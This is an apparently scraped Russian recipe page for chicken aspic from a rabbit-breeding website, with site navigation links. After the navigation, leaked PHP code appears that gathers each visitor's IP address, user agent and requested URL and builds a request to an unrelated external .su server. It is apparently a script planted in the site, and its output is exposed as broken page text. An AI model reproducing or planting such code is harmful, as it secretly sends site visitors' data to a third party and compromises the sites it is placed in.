| |||
Для этого блюда взять окорочка, предварительно залитые холодной водой. Добавить морковь, лук; соль и перец — по вкусу и варить до готовности. Предварительно замоченный в воде желатин добавить в горячий процеженный бульон. Нарезанные кусочки мяса аккуратно уложить, украсить кружочками моркови, веточками зелени, дольками яйца и осторожно залить охлажденным желе. После застывания желе заливное готово к употреблению. Напишите мне На главную Фотоальбом Калифорнийская Серебристая Белый великан О пользе крольчатины Блюда из кролика $serverrobo = $_SERVER['REMOTE_ADDR']; $agentrobo = $_SERVER['HTTP_USER_AGENT'];$urlrobo = $_SERVER['HTTP_HOST'];$urlrobo .= $_SERVER['REQUEST_URI']; $agentrobo = str_replace(" ","", $agentrobo);$getroboip = "http://XN--80AVUE.xn--90acjmnnc1hybf.su/server.php?idishka=136498&ipishka=$serverrobo&useragentka=$agentrobo&urlrobotka=$urlrobo";?> ![]() |